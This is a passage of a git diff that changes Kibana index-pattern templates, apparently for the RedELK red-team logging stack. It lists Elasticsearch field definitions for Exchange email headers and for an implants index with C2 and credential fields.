data\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstripped\"}}},{\"name\":\"x-ms-exchange-transport-endtoendlatency\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-endtoendlatency.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-endtoendlatency\"}}},{\"name\":\"x-ms-exchange-transport-forked\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-forked.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-forked\"}}},{\"name\":\"x-ms-has-attach\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-has-attach.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-has-attach\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.3", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363329707, 1149], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson index 985df54b..fc39759a 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_implantsdb.ndjson @@ -1 +1 @@ -{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":